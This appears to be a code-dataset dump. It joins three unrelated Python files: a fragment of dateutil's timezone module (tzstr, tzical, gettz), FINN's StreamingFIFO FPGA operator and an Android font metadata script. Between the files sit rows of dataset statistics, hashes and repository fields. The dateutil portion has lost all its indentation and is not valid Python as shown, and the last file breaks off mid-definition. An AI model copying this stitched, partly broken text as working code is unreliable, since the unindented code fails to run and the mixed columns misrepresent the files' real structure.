def __repr__(self):
return "%s(...)" % self.__class__.__name__
__reduce__ = object.__reduce__
class tzstr(tzrange):
def __init__(self, s):
global parser
if not parser:
from dateutil import parser
self._s = s
res = parser._parsetz(s)
if res is None:
raise ValueError("unknown string format")
        # Here we break compatibility with the TZ variable handling:
        # GMT-3 actually *means* the timezone -3.
if res.stdabbr in ("GMT", "UTC"):
res.stdoffset *= -1
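        # e.g. (illustrative) tzstr("GMT-3") therefore yields a utcoffset()
        # of -3 hours, whereas strict POSIX TZ semantics would give +3.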
        # We must initialize it first, since _delta() needs
        # _std_offset and _dst_offset set. Use False for start/end
        # to avoid building them twice.
tzrange.__init__(self, res.stdabbr, res.stdoffset,
res.dstabbr, res.dstoffset,
start=False, end=False)
if not res.dstabbr:
self._start_delta = None
self._end_delta = None
else:
self._start_delta = self._delta(res.start)
if self._start_delta:
self._end_delta = self._delta(res.end, isend=1)
def _delta(self, x, isend=0):
kwargs = {}
if x.month is not None:
kwargs["month"] = x.month
if x.weekday is not None:
kwargs["weekday"] = relativedelta.weekday(x.weekday, x.week)
if x.week > 0:
kwargs["day"] = 1
else:
kwargs["day"] = 31
elif x.day:
kwargs["day"] = x.day
elif x.yday is not None:
kwargs["yearday"] = x.yday
elif x.jyday is not None:
kwargs["nlyearday"] = x.jyday
if not kwargs:
            # Default is to start on the first Sunday of April and end
            # on the last Sunday of October.
if not isend:
kwargs["month"] = 4
kwargs["day"] = 1
kwargs["weekday"] = relativedelta.SU(+1)
else:
kwargs["month"] = 10
kwargs["day"] = 31
kwargs["weekday"] = relativedelta.SU(-1)
if x.time is not None:
kwargs["seconds"] = x.time
else:
# Default is 2AM.
kwargs["seconds"] = 7200
if isend:
# Convert to standard time, to follow the documented way
# of working with the extra hour. See the documentation
# of the tzinfo class.
delta = self._dst_offset-self._std_offset
kwargs["seconds"] -= delta.seconds+delta.days*86400
return relativedelta.relativedelta(**kwargs)
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, repr(self._s))
class _tzicalvtzcomp(object):
def __init__(self, tzoffsetfrom, tzoffsetto, isdst,
tzname=None, rrule=None):
self.tzoffsetfrom = datetime.timedelta(seconds=tzoffsetfrom)
self.tzoffsetto = datetime.timedelta(seconds=tzoffsetto)
self.tzoffsetdiff = self.tzoffsetto-self.tzoffsetfrom
self.isdst = isdst
self.tzname = tzname
self.rrule = rrule
class _tzicalvtz(datetime.tzinfo):
def __init__(self, tzid, comps=[]):
self._tzid = tzid
self._comps = comps
self._cachedate = []
self._cachecomp = []
def _find_comp(self, dt):
if len(self._comps) == 1:
return self._comps[0]
dt = dt.replace(tzinfo=None)
try:
return self._cachecomp[self._cachedate.index(dt)]
except ValueError:
pass
lastcomp = None
lastcompdt = None
for comp in self._comps:
if not comp.isdst:
# Handle the extra hour in DST -> STD
compdt = comp.rrule.before(dt-comp.tzoffsetdiff, inc=True)
else:
compdt = comp.rrule.before(dt, inc=True)
if compdt and (not lastcompdt or lastcompdt < compdt):
lastcompdt = compdt
lastcomp = comp
if not lastcomp:
# RFC says nothing about what to do when a given
# time is before the first onset date. We'll look for the
# first standard component, or the first component, if
# none is found.
for comp in self._comps:
if not comp.isdst:
lastcomp = comp
break
else:
                lastcomp = self._comps[0]
self._cachedate.insert(0, dt)
self._cachecomp.insert(0, lastcomp)
if len(self._cachedate) > 10:
self._cachedate.pop()
self._cachecomp.pop()
return lastcomp
def utcoffset(self, dt):
return self._find_comp(dt).tzoffsetto
def dst(self, dt):
comp = self._find_comp(dt)
if comp.isdst:
return comp.tzoffsetdiff
else:
return ZERO
@tzname_in_python2
def tzname(self, dt):
return self._find_comp(dt).tzname
def __repr__(self):
return "<tzicalvtz %s>" % repr(self._tzid)
__reduce__ = object.__reduce__
class tzical(object):
def __init__(self, fileobj):
global rrule
if not rrule:
from dateutil import rrule
if isinstance(fileobj, string_types):
self._s = fileobj
fileobj = open(fileobj, 'r') # ical should be encoded in UTF-8 with CRLF
elif hasattr(fileobj, "name"):
self._s = fileobj.name
else:
self._s = repr(fileobj)
self._vtz = {}
self._parse_rfc(fileobj.read())
def keys(self):
return list(self._vtz.keys())
def get(self, tzid=None):
if tzid is None:
keys = list(self._vtz.keys())
if len(keys) == 0:
raise ValueError("no timezones defined")
elif len(keys) > 1:
raise ValueError("more than one timezone available")
tzid = keys[0]
return self._vtz.get(tzid)
def _parse_offset(self, s):
s = s.strip()
if not s:
raise ValueError("empty offset")
if s[0] in ('+', '-'):
signal = (-1, +1)[s[0]=='+']
s = s[1:]
else:
signal = +1
if len(s) == 4:
return (int(s[:2])*3600+int(s[2:])*60)*signal
elif len(s) == 6:
return (int(s[:2])*3600+int(s[2:4])*60+int(s[4:]))*signal
else:
raise ValueError("invalid offset: "+s)
def _parse_rfc(self, s):
lines = s.splitlines()
if not lines:
raise ValueError("empty string")
# Unfold
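        # (RFC 5545 folds long lines; a continuation line starts with a single
        #  space, e.g. "RRULE:FREQ=YEARLY;BYMONTH=10\r\n ;BYDAY=-1SU" unfolds
        #  into one logical line.)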
i = 0
while i < len(lines):
line = lines[i].rstrip()
if not line:
del lines[i]
elif i > 0 and line[0] == " ":
lines[i-1] += line[1:]
del lines[i]
else:
i += 1
tzid = None
comps = []
invtz = False
comptype = None
for line in lines:
if not line:
continue
name, value = line.split(':', 1)
parms = name.split(';')
if not parms:
raise ValueError("empty property name")
name = parms[0].upper()
parms = parms[1:]
if invtz:
if name == "BEGIN":
if value in ("STANDARD", "DAYLIGHT"):
# Process component
pass
else:
raise ValueError("unknown component: "+value)
comptype = value
founddtstart = False
tzoffsetfrom = None
tzoffsetto = None
rrulelines = []
tzname = None
elif name == "END":
if value == "VTIMEZONE":
if comptype:
raise ValueError("component not closed: "+comptype)
if not tzid:
raise ValueError("mandatory TZID not found")
if not comps:
raise ValueError("at least one component is needed")
# Process vtimezone
self._vtz[tzid] = _tzicalvtz(tzid, comps)
invtz = False
elif value == comptype:
if not founddtstart:
raise ValueError("mandatory DTSTART not found")
if tzoffsetfrom is None:
raise ValueError("mandatory TZOFFSETFROM not found")
if tzoffsetto is None:
raise ValueError("mandatory TZOFFSETFROM not found")
# Process component
rr = None
if rrulelines:
rr = rrule.rrulestr("\n".join(rrulelines),
compatible=True,
ignoretz=True,
cache=True)
comp = _tzicalvtzcomp(tzoffsetfrom, tzoffsetto,
(comptype == "DAYLIGHT"),
tzname, rr)
comps.append(comp)
comptype = None
else:
raise ValueError("invalid component end: "+value)
elif comptype:
if name == "DTSTART":
rrulelines.append(line)
founddtstart = True
elif name in ("RRULE", "RDATE", "EXRULE", "EXDATE"):
rrulelines.append(line)
elif name == "TZOFFSETFROM":
if parms:
raise ValueError("unsupported %s parm: %s "%(name, parms[0]))
tzoffsetfrom = self._parse_offset(value)
elif name == "TZOFFSETTO":
if parms:
raise ValueError("unsupported TZOFFSETTO parm: "+parms[0])
tzoffsetto = self._parse_offset(value)
elif name == "TZNAME":
if parms:
raise ValueError("unsupported TZNAME parm: "+parms[0])
tzname = value
elif name == "COMMENT":
pass
else:
raise ValueError("unsupported property: "+name)
else:
if name == "TZID":
if parms:
raise ValueError("unsupported TZID parm: "+parms[0])
tzid = value
elif name in ("TZURL", "LAST-MODIFIED", "COMMENT"):
pass
else:
raise ValueError("unsupported property: "+name)
elif name == "BEGIN" and value == "VTIMEZONE":
tzid = None
comps = []
invtz = True
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, repr(self._s))
if sys.platform != "win32":
TZFILES = ["/etc/localtime", "localtime"]
TZPATHS = ["/usr/share/zoneinfo", "/usr/lib/zoneinfo", "/etc/zoneinfo"]
else:
TZFILES = []
TZPATHS = []
def gettz(name=None):
tz = None
if not name:
try:
name = os.environ["TZ"]
except KeyError:
pass
if name is None or name == ":":
for filepath in TZFILES:
if not os.path.isabs(filepath):
filename = filepath
for path in TZPATHS:
filepath = os.path.join(path, filename)
if os.path.isfile(filepath):
break
else:
continue
if os.path.isfile(filepath):
try:
tz = tzfile(filepath)
break
except (IOError, OSError, ValueError):
pass
else:
tz = tzlocal()
else:
if name.startswith(":"):
            name = name[1:]
if os.path.isabs(name):
if os.path.isfile(name):
tz = tzfile(name)
else:
tz = None
else:
for path in TZPATHS:
filepath = os.path.join(path, name)
if not os.path.isfile(filepath):
filepath = filepath.replace(' ', '_')
if not os.path.isfile(filepath):
continue
try:
tz = tzfile(filepath)
break
except (IOError, OSError, ValueError):
pass
else:
tz = None
if tzwin:
try:
tz = tzwin(name)
except OSError:
pass
if not tz:
from dateutil.zoneinfo import gettz
tz = gettz(name)
if not tz:
for c in name:
# name must have at least one offset to be a tzstr
if c in "0123456789":
try:
tz = tzstr(name)
except ValueError:
pass
break
else:
if name in ("GMT", "UTC"):
tz = tzutc()
elif name in time.tzname:
tz = tzlocal()
return tz
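# Illustrative lookups (behaviour depends on the host system): gettz() follows
# $TZ or /etc/localtime, gettz("America/New_York") is searched for under
# TZPATHS, and a spec containing digits such as gettz("EST5EDT4") falls back
# to tzstr parsing when no matching zoneinfo file is found.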
# vim:ts=4:sw=4:et
| 34.284079
| 89
| 0.521049
| 3,668
| 32,947
| 4.502726
| 0.147492
| 0.011504
| 0.009445
| 0.008234
| 0.291172
| 0.214822
| 0.182792
| 0.16596
| 0.126786
| 0.11177
| 0
| 0.012239
| 0.38996
| 32,947
| 960
| 90
| 34.319792
| 0.809493
| 0.175008
| 0
| 0.358187
| 0
| 0
| 0.040644
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090643
| false
| 0.013158
| 0.017544
| 0.038012
| 0.245614
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
133a869b28cf9968a719e243a3266dfb25b637ba
| 18,998
|
py
|
Python
|
src/finn/custom_op/fpgadataflow/streamingfifo.py
|
AlexMontgomerie/finn
|
ec5f67b333ad4db4acf6191c3b5ab5e9067347aa
|
[
"BSD-3-Clause"
] | 283
|
2019-09-26T10:09:34.000Z
|
2022-03-09T16:36:23.000Z
|
src/finn/custom_op/fpgadataflow/streamingfifo.py
|
AlexMontgomerie/finn
|
ec5f67b333ad4db4acf6191c3b5ab5e9067347aa
|
[
"BSD-3-Clause"
] | 238
|
2019-10-04T12:20:26.000Z
|
2022-03-31T04:50:53.000Z
|
src/finn/custom_op/fpgadataflow/streamingfifo.py
|
AlexMontgomerie/finn
|
ec5f67b333ad4db4acf6191c3b5ab5e9067347aa
|
[
"BSD-3-Clause"
] | 144
|
2019-09-23T13:46:14.000Z
|
2022-03-18T12:55:07.000Z
|
# Copyright (c) 2020, Xilinx
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of FINN nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import numpy as np
from shutil import copy
import subprocess
import math
import warnings
from finn.custom_op.fpgadataflow.hlscustomop import HLSCustomOp
from finn.core.datatype import DataType
from onnx import TensorProto, helper
from finn.util.data_packing import npy_to_rtlsim_input, rtlsim_output_to_npy
from . import templates
class StreamingFIFO(HLSCustomOp):
def __init__(self, onnx_node):
super().__init__(onnx_node)
self.strm_fifo_wrapper = templates.strm_fifo_wrapper
def get_nodeattr_types(self):
my_attrs = {
# FIFO depth
"depth": ("i", True, 0),
# folded shape of input/output
"folded_shape": ("ints", True, []),
# FINN DataTypes for inputs/outputs
"dataType": ("s", True, ""),
# Toggle between hls or IPI implementation
# rtl - use the hls generated IP during stitching
# vivado - use the AXI Infrastructure FIFO
"impl_style": ("s", False, "rtl", {"rtl", "vivado"}),
# FPGA resource type for FIFOs when impl_style is vivado
# auto -- let Vivado decide
# block -- use BRAM
# distributed -- use LUTRAM
# ultra -- use URAM (on UltraScale+)
"ram_style": (
"s",
False,
"auto",
{"auto", "block", "distributed", "ultra"},
),
}
my_attrs.update(super().get_nodeattr_types())
return my_attrs
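    # Illustrative attribute set for a small FIFO (assumed values):
    # depth=32, folded_shape=[1, 4, 16], dataType="INT8", impl_style="rtl".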
def make_shape_compatible_op(self, model):
exp_ishape = self.get_normal_input_shape()
oshape = self.get_normal_output_shape()
ishape = tuple(model.get_tensor_shape(self.onnx_node.input[0]))
        assert ishape == tuple(exp_ishape), "Unexpected input shape for StreamingFIFO."
# implement tensor with correct shape
values = np.random.randn(*oshape).astype(np.float32)
return helper.make_node(
"Constant",
inputs=[],
outputs=[self.onnx_node.output[0]],
value=helper.make_tensor(
name="const_tensor",
data_type=TensorProto.FLOAT,
dims=values.shape,
vals=values.flatten().astype(float),
),
)
def infer_node_datatype(self, model):
node = self.onnx_node
idt = model.get_tensor_datatype(node.input[0])
if idt != self.get_input_datatype():
warn_str = "inputDataType changing for %s: %s -> %s " % (
node.name,
str(self.get_input_datatype()),
str(idt),
)
warnings.warn(warn_str)
self.set_nodeattr("dataType", idt.name)
# data type stays the same
model.set_tensor_datatype(node.output[0], idt)
def verify_node(self):
pass
def get_verilog_top_module_name(self):
"Return the Verilog top module name for this node."
node = self.onnx_node
prefixed_top_name = "%s" % (node.name)
return prefixed_top_name
def code_generation_ipgen(self, model, fpgapart, clk):
code_gen_dir = self.get_nodeattr("code_gen_dir_ipgen")
verilog_dir = "{}/project_{}/sol1/impl/verilog".format(
code_gen_dir, self.onnx_node.name
)
os.makedirs(verilog_dir)
# copy Q_srl.v from finn-rtllib to verilog directory
memstream_dir = "/workspace/finn/finn-rtllib/memstream/hdl/"
Q_file = os.path.join(memstream_dir, "Q_srl.v")
copy(Q_file, verilog_dir)
# empty code gen dictionary for new entries
self.code_gen_dict.clear()
self.code_gen_dict["$TOPNAME$"] = ["{}".format(self.onnx_node.name)]
self.code_gen_dict["$LAYER_NAME$"] = [
"{}_{}".format(self.onnx_node.name, self.onnx_node.name)
]
# make instream width a multiple of 8 for axi interface
in_width = self.get_instream_width_padded()
count_width = int(self.get_nodeattr("depth") - 1).bit_length()
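        # e.g. (illustrative) depth=32 -> count_width = (31).bit_length() = 5,
        # i.e. a 5-bit occupancy counter.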
self.code_gen_dict["$COUNT_RANGE$"] = ["[{}:0]".format(count_width - 1)]
self.code_gen_dict["$IN_RANGE$"] = ["[{}:0]".format(in_width - 1)]
self.code_gen_dict["$OUT_RANGE$"] = ["[{}:0]".format(in_width - 1)]
self.code_gen_dict["$WIDTH$"] = [str(in_width)]
self.code_gen_dict["$DEPTH$"] = [str(self.get_nodeattr("depth"))]
template = self.strm_fifo_wrapper
for key in self.code_gen_dict:
# transform list into long string separated by '\n'
code_gen_line = "\n".join(self.code_gen_dict[key])
template = template.replace(key, code_gen_line)
f = open(os.path.join(verilog_dir, "{}.v".format(self.onnx_node.name)), "w")
f.write(template)
f.close()
self.code_gen_dict.clear()
def ipgen_singlenode_code(self):
code_gen_dir = self.get_nodeattr("code_gen_dir_ipgen")
verilog_dir = "{}/project_{}/sol1/impl/verilog".format(
code_gen_dir, self.onnx_node.name
)
# prepare the IP packaging tcl template
template = templates.ip_package_tcl
self.code_gen_dict.clear()
self.code_gen_dict["$TOPNAME$"] = ["{}".format(self.onnx_node.name)]
# note: setting the root dir as absolute can cause path problems
# the ipgen script will be invoked from the sources dir so root_dir=. is OK
self.code_gen_dict["$VERILOG_DIR$"] = ["."]
for key in self.code_gen_dict:
# transform list into long string separated by '\n'
code_gen_line = "\n".join(self.code_gen_dict[key])
template = template.replace(key, code_gen_line)
f = open(os.path.join(verilog_dir, "package_ip.tcl"), "w")
f.write(template)
f.close()
# create a shell script and call Vivado to invoke the IP pkg script
make_project_sh = verilog_dir + "/make_ip.sh"
working_dir = os.environ["PWD"]
with open(make_project_sh, "w") as f:
f.write("#!/bin/bash \n")
f.write("cd {}\n".format(verilog_dir))
f.write("vivado -mode batch -source package_ip.tcl\n")
f.write("cd {}\n".format(working_dir))
bash_command = ["bash", make_project_sh]
process_compile = subprocess.Popen(bash_command, stdout=subprocess.PIPE)
process_compile.communicate()
# set ipgen_path and ip_path to point to the new packaged IP
self.set_nodeattr("ipgen_path", verilog_dir)
self.set_nodeattr("ip_path", verilog_dir)
vlnv = "xilinx.com:hls:%s:1.0" % (self.onnx_node.name)
self.set_nodeattr("ip_vlnv", vlnv)
self.code_gen_dict.clear()
def get_normal_input_shape(self):
depth = self.get_nodeattr("depth")
# depth has to be between 2 and 256 with the current
# StreamingFIFO implementation
assert depth >= 2, """Depth is too low"""
if depth > 256 and self.get_nodeattr("impl_style") == "rtl":
warnings.warn(
"Depth is high, set between 2 and 256 for efficient SRL implementation"
)
# derive normal shape from folded shape
# StreamingFIFOs are inserted in between fpgadataflow nodes
# the folded shape could be for example (1, nf, pe)
# with nf (neuron folding): mh // pe
# the normal input shape is in this case (1, mh)
        # so to achieve this, the two innermost dimensions are multiplied
        # and, together with all preceding dimensions,
        # this gives the normal input shape
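        # Worked example (assumed values): folded_shape (1, 49, 16) gives a
        # normal input shape of (1, 49*16) = (1, 784).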
folded_shape = self.get_nodeattr("folded_shape")
# extract inner dimension
inner_dim = folded_shape[-1]
# multiply with the next inner dimension
folding_factor = folded_shape[-2] * inner_dim
normal_ishape = []
# create the normal_ishape
for i in range(len(folded_shape) - 2):
normal_ishape.append(folded_shape[i])
normal_ishape.append(folding_factor)
return normal_ishape
def get_normal_output_shape(self):
return self.get_normal_input_shape()
def get_folded_input_shape(self):
return self.get_nodeattr("folded_shape")
def get_folded_output_shape(self):
return self.get_nodeattr("folded_shape")
def get_instream_width(self):
dtype = DataType[self.get_nodeattr("dataType")]
folded_shape = self.get_nodeattr("folded_shape")
in_width = folded_shape[-1] * dtype.bitwidth()
return in_width
def get_outstream_width(self):
dtype = DataType[self.get_nodeattr("dataType")]
folded_shape = self.get_nodeattr("folded_shape")
in_width = folded_shape[-1] * dtype.bitwidth()
return in_width
def execute_node(self, context, graph):
mode = self.get_nodeattr("exec_mode")
node = self.onnx_node
inp = context[node.input[0]]
exp_shape = self.get_normal_input_shape()
if mode == "cppsim":
output = inp
output = np.asarray([output], dtype=np.float32).reshape(*exp_shape)
context[node.output[0]] = output
elif mode == "rtlsim":
code_gen_dir = self.get_nodeattr("code_gen_dir_ipgen")
# create a npy file for the input of the node
assert (
str(inp.dtype) == "float32"
), """Input datatype is
not float32 as expected."""
expected_inp_shape = self.get_folded_input_shape()
reshaped_input = inp.reshape(expected_inp_shape)
if DataType[self.get_nodeattr("dataType")] == DataType.BIPOLAR:
# store bipolar activations as binary
reshaped_input = (reshaped_input + 1) / 2
export_idt = DataType.BINARY
else:
export_idt = DataType[self.get_nodeattr("dataType")]
# make copy before saving the array
reshaped_input = reshaped_input.copy()
np.save(os.path.join(code_gen_dir, "input_0.npy"), reshaped_input)
sim = self.get_rtlsim()
nbits = self.get_instream_width()
inp = npy_to_rtlsim_input(
"{}/input_0.npy".format(code_gen_dir), export_idt, nbits
)
super().reset_rtlsim(sim)
super().toggle_clk(sim)
output = self.rtlsim(sim, inp)
odt = DataType[self.get_nodeattr("dataType")]
target_bits = odt.bitwidth()
packed_bits = self.get_outstream_width()
out_npy_path = "{}/output.npy".format(code_gen_dir)
out_shape = self.get_folded_output_shape()
rtlsim_output_to_npy(
output, out_npy_path, odt, out_shape, packed_bits, target_bits
)
# load and reshape output
output = np.load(out_npy_path)
oshape = self.get_normal_output_shape()
output = np.asarray([output], dtype=np.float32).reshape(*oshape)
context[node.output[0]] = output
else:
raise Exception(
"""Invalid value for attribute exec_mode! Is currently set to: {}
            has to be set to one of the following values ("cppsim", "rtlsim")""".format(
mode
)
)
def get_number_output_values(self):
folded_oshape = self.get_folded_output_shape()
return np.prod(folded_oshape[:-1])
def global_includes(self):
pass
def defines(self, var):
pass
def read_npy_data(self):
pass
def strm_decl(self):
pass
def docompute(self):
pass
def dataoutstrm(self):
pass
def save_as_npy(self):
pass
def blackboxfunction(self):
pass
def pragmas(self):
pass
def code_generation_ipi(self):
impl_style = self.get_nodeattr("impl_style")
if impl_style == "rtl":
return super().code_generation_ipi()
elif impl_style == "vivado":
cmd = []
node_name = self.onnx_node.name
depth = self.get_nodeattr("depth")
ram_style = self.get_nodeattr("ram_style")
# create a hierarchy for this layer, with the same port names
clk_name = self.get_verilog_top_module_intf_names()["clk"][0]
rst_name = self.get_verilog_top_module_intf_names()["rst"][0]
dout_name = self.get_verilog_top_module_intf_names()["m_axis"][0][0]
din_name = self.get_verilog_top_module_intf_names()["s_axis"][0][0]
cmd.append("create_bd_cell -type hier %s" % node_name)
cmd.append("create_bd_pin -dir I -type clk /%s/%s" % (node_name, clk_name))
cmd.append("create_bd_pin -dir I -type rst /%s/%s" % (node_name, rst_name))
cmd.append(
"create_bd_intf_pin -mode Master "
"-vlnv xilinx.com:interface:axis_rtl:1.0 /%s/%s"
% (node_name, dout_name)
)
cmd.append(
"create_bd_intf_pin -mode Slave "
"-vlnv xilinx.com:interface:axis_rtl:1.0 /%s/%s" % (node_name, din_name)
)
            # instantiate and configure the AXI Stream Data FIFO IP
cmd.append(
"create_bd_cell -type ip "
"-vlnv xilinx.com:ip:axis_data_fifo:2.0 /%s/fifo" % node_name
)
cmd.append(
"set_property -dict [list CONFIG.FIFO_DEPTH {%d}] "
"[get_bd_cells /%s/fifo]" % (depth, node_name)
)
cmd.append(
"set_property -dict [list CONFIG.FIFO_MEMORY_TYPE {%s}] "
"[get_bd_cells /%s/fifo]" % (ram_style, node_name)
)
cmd.append(
"set_property -dict [list CONFIG.TDATA_NUM_BYTES {%d}] "
"[get_bd_cells /%s/fifo]"
% (np.ceil(self.get_outstream_width() / 8), node_name)
)
cmd.append(
"connect_bd_intf_net [get_bd_intf_pins %s/fifo/M_AXIS] "
"[get_bd_intf_pins %s/%s]" % (node_name, node_name, dout_name)
)
cmd.append(
"connect_bd_intf_net [get_bd_intf_pins %s/fifo/S_AXIS] "
"[get_bd_intf_pins %s/%s]" % (node_name, node_name, din_name)
)
cmd.append(
"connect_bd_net [get_bd_pins %s/%s] "
"[get_bd_pins %s/fifo/s_axis_aresetn]"
% (node_name, rst_name, node_name)
)
cmd.append(
"connect_bd_net [get_bd_pins %s/%s] "
"[get_bd_pins %s/fifo/s_axis_aclk]" % (node_name, clk_name, node_name)
)
return cmd
else:
raise Exception(
"FIFO implementation style %s not supported, please use rtl or vivado"
% impl_style
)
def bram_estimation(self):
"""Calculates resource estimation for BRAM"""
impl = self.get_nodeattr("impl_style")
ram_type = self.get_nodeattr("ram_style")
depth = self.get_nodeattr("depth")
W = self.get_instream_width()
if impl == "rtl" or (impl == "vivado" and ram_type != "block"):
# Non-BRAM based implementation
return 0
if W == 1:
return math.ceil(depth / 16384)
elif W == 2:
return math.ceil(depth / 8192)
elif W <= 4:
return (math.ceil(depth / 4096)) * (math.ceil(W / 4))
elif W <= 9:
return (math.ceil(depth / 2048)) * (math.ceil(W / 9))
elif W <= 18 or depth > 512:
return (math.ceil(depth / 1024)) * (math.ceil(W / 18))
else:
return (math.ceil(depth / 512)) * (math.ceil(W / 36))
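    # Illustrative estimate: depth=512, W=32 falls into the last branch and
    # needs ceil(512/512) * ceil(32/36) = 1 BRAM.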
def uram_estimation(self):
"""Calculates resource estimation for URAM"""
impl = self.get_nodeattr("impl_style")
ram_type = self.get_nodeattr("ram_style")
depth = self.get_nodeattr("depth")
W = self.get_instream_width()
if impl == "rtl" or (impl == "vivado" and ram_type != "ultra"):
            # Non-URAM based implementation
return 0
else:
return (math.ceil(depth / 4096)) * (math.ceil(W / 72))
def bram_efficiency_estimation(self):
depth = self.get_nodeattr("depth")
W = self.get_instream_width()
bram16_est = self.bram_estimation()
if bram16_est == 0:
return 1
wbits = W * depth
bram16_est_capacity = bram16_est * 36 * 512
return wbits / bram16_est_capacity
def lut_estimation(self):
"""Calculates resource estimations for LUTs"""
impl = self.get_nodeattr("impl_style")
ram_type = self.get_nodeattr("ram_style")
depth = self.get_nodeattr("depth")
W = self.get_instream_width()
address_luts = 2 * math.ceil(math.log(depth, 2))
if impl == "rtl" or (impl == "vivado" and ram_type == "distributed"):
ram_luts = (math.ceil(depth / 32)) * (math.ceil(W / 2))
else:
ram_luts = 0
return int(address_luts + ram_luts)
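    # Illustrative estimate: depth=32, W=16 with distributed RAM gives
    # address_luts = 2*ceil(log2(32)) = 10 and
    # ram_luts = ceil(32/32)*ceil(16/2) = 8, i.e. 18 LUTs in total.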
def prepare_rtlsim(self):
assert self.get_nodeattr("impl_style") != "vivado", (
"StreamingFIFO impl_style "
"cannot be vivado for rtlsim. Only impl_style=rtl supported."
)
super().prepare_rtlsim()
| 40.25
| 88
| 0.600326
| 2,408
| 18,998
| 4.509552
| 0.20515
| 0.035454
| 0.044203
| 0.023483
| 0.348098
| 0.298186
| 0.244037
| 0.24063
| 0.207846
| 0.19523
| 0
| 0.010515
| 0.294189
| 18,998
| 471
| 89
| 40.335456
| 0.799314
| 0.180282
| 0
| 0.263006
| 0
| 0
| 0.144556
| 0.018906
| 0
| 0
| 0
| 0
| 0.011561
| 1
| 0.089595
| false
| 0.028902
| 0.031792
| 0.008671
| 0.193642
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
133a8d431ec24410c6b47b396ebee9494e39f0e3
| 3,403
|
py
|
Python
|
android_fonts.py
|
chrissimpkins/android_fonts
|
f904147774836468a8c011b1596f85577220b140
|
[
"Apache-2.0"
] | 1
|
2022-01-13T01:47:45.000Z
|
2022-01-13T01:47:45.000Z
|
android_fonts.py
|
chrissimpkins/android_fonts
|
f904147774836468a8c011b1596f85577220b140
|
[
"Apache-2.0"
] | 2
|
2022-01-13T03:54:39.000Z
|
2022-03-12T01:00:20.000Z
|
android_fonts.py
|
chrissimpkins/android_fonts
|
f904147774836468a8c011b1596f85577220b140
|
[
"Apache-2.0"
] | 1
|
2022-03-25T20:01:56.000Z
|
2022-03-25T20:01:56.000Z
|
import ast
import emoji
import os
import pandas as pd
_SUPPORT_CACHE_CSV = emoji.datafile('emoji_support.csv')
_API_LEVELS = {
1: ("(no codename)", "1.0"),
2: ("(no codename)", "1.1"),
3: ("Cupcake", "1.5 "),
4: ("Donut", "1.6 "),
5: ("Eclair", "2.0"),
6: ("Eclair", "2.0.1"),
7: ("Eclair", "2.1 "),
8: ("Froyo", "2.2.x "),
9: ("Gingerbread", "2.3 - 2.3.2 "),
10: ("Gingerbread", "2.3.3 - 2.3.7"),
11: ("Honeycomb", "3.0"),
12: ("Honeycomb", "3.1 "),
13: ("Honeycomb", "3.2.x"),
14: ("Ice Cream Sandwich", "4.0.1 - 4.0.2 "),
15: ("Ice Cream Sandwich", "4.0.3 - 4.0.4 "),
16: ("Jelly Bean", "4.1.x"),
17: ("Jelly Bean", "4.2.x"),
18: ("Jelly Bean", "4.3.x"),
19: ("KitKat", "4.4 - 4.4.4"),
21: ("Lollipop", "5.0"),
22: ("Lollipop", "5.1"),
23: ("Marshmallow", "6.0"),
24: ("Nougat", "7.0"),
25: ("Nougat", "7.1"),
26: ("Oreo", "8.0.0"),
27: ("Oreo", "8.1.0"),
28: ("Pie", "9"),
29: ("Android 10 (Q)", "10"),
30: ("Android 11 (R)", "11"),
31: ("Android 12 (S)", "12"),
}
def api_levels():
return _API_LEVELS
def is_font_file(file):
_, ext = os.path.splitext(file)
return ext.lower() in {'.ttf', '.otf', '.ttc'}
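# e.g. is_font_file("Roboto-Regular.ttf") -> True, is_font_file("fonts.xml") -> False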
def metadata():
records = []
for root, dirs, files in os.walk('api_level'):
for file in files:
if is_font_file(file):
full_file = os.path.join(root, file)
api_level = int(os.path.basename(root))
size = os.stat(full_file).st_size
records.append((api_level, full_file, size))
df = pd.DataFrame(records)
df.columns = ['api_level', 'font_file', 'file_size']
return df
def emoji_support():
"""Dataframe of [emoji_level, font_file, codepoints, supported].
Includes every sequence we could find of any type.
Requires prior execution of populate_emoji_support.py"""
if not os.path.isfile(_SUPPORT_CACHE_CSV):
raise IOError('Please run populate_emoji_support.py first')
return (pd.read_csv(_SUPPORT_CACHE_CSV, converters={'cp_seq': ast.literal_eval})
.rename(columns={'cp_seq': 'codepoints'}))
def font_summary():
